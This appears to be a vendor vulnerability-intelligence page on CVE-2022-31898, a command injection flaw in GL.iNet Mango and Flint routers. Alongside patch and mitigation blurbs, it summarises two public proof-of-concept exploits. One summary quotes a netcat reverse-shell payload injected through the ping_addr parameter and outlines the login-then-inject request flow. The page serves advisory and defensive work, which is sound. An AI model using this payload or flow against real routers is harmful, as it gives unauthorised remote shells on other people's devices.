CVE-2022-31898 is a command injection vulnerability affecting GL.iNet GL-MT300N-V2 Mango (v3.212) and GL-AX1800 Flint (v3.214) routers. The vulnerability exists in the handling of the 'ping_addr' and 'trace_addr' parameters, which are not properly sanitized before being passed to system commands, allowing attackers to inject arbitrary commands.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
Repository contains a small Python PoC exploit for CVE-2022-31898 (authenticated OS command injection) affecting GL.iNet routers (README highlights GL-MT300N-V2 Mango) on firmware versions below 3.215. Structure: - README.md: Describes the vulnerability in the diagnostic API `ping_addr` parameter, provides usage instructions, and suggests remediation. - mangopunch.py: Standalone exploit script. Exploit flow (mangopunch.py): 1) `login()` sends a POST request to `/cgi-bin/api/router/login` with form data `pwd=<password>` to obtain a token from JSON response (`j['token']` when `code == 0`). 2) `exploit()` sends a POST request to `/cgi-bin/api/internet/ping` with header `Authorization: <token>` and form data `ping_addr='; nc LHOST LPORT -e /bin/ash ;'` to trigger command injection. 3) The script treats an HTTP timeout as a success condition (common when the injected command blocks while establishing the reverse shell). Key capabilities: - Authenticated remote command execution via command injection in `ping_addr`. - Hardcoded reverse shell payload using netcat and `/bin/ash` (BusyBox ash), calling back to an attacker-controlled listener. Notable implementation details: - Supports HTTP by default; HTTPS optional via `-t/--https`. - TLS certificate verification is disabled (`verify=False`) and urllib3 warnings are suppressed. - Default parameters in code differ from README (code defaults: rport=80, lport=8008, pwd='goodlife'; README claims rport=443 and lport required).
This repository contains a Python proof-of-concept exploit for CVE-2022-31898, targeting GL-iNet Mango (MTN300n) and similar routers running firmware below version 3.215. The exploit leverages an authenticated command injection vulnerability in the /cgi-bin/api/internet/ping endpoint. After authenticating to the router's web API using a provided admin password, the script injects a command via the ping_addr parameter, causing the router to initiate a reverse shell connection to the attacker's machine (specified by the user). The exploit requires valid credentials and network access to the router's web interface (HTTP or HTTPS). The repository consists of a single exploit script (cve-2022-31898.py), a README with usage instructions and an example, and a GPL license file. The exploit is operational, providing a working reverse shell payload, but is not part of a larger exploitation framework.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
1 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.